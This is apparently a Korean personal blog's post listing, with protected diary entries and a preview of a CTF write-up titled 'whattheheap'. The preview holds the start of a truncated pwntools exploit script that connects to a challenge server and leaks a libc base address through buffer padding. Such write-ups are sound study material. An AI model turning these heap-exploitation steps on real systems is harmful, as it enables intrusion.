y0u_bat
[계획] 2018.6.14
보호되어 있는 글입니다.
일기+계획
2018. 6. 14. 13:13
[H3XOR] whattheheap
[H3XOR] whattheheap심심해서 풀어봤습니당. Exploitfrom pwn import * context.log_level = 'debug' #s = process("./whattheheap") s = remote("49.236.136.140",16000) def leak(): s.recvuntil("please input your name!\n") s.send("a"*0x28) s.sendline("6") s.recvuntil("a"*0x28) libc_base = u64(s.recv(6) + "\x00\x00") - 0x18c627 s.sendline("5") s.recvuntil("Enter the name you want to change.\n") s.send("b"*0xd8) ..
System/[CTF]
2018. 6. 14. 08:45
[계획] 2018.06.13
보호되어 있는 글입니다.
일기+계획
2018. 6. 13. 05:06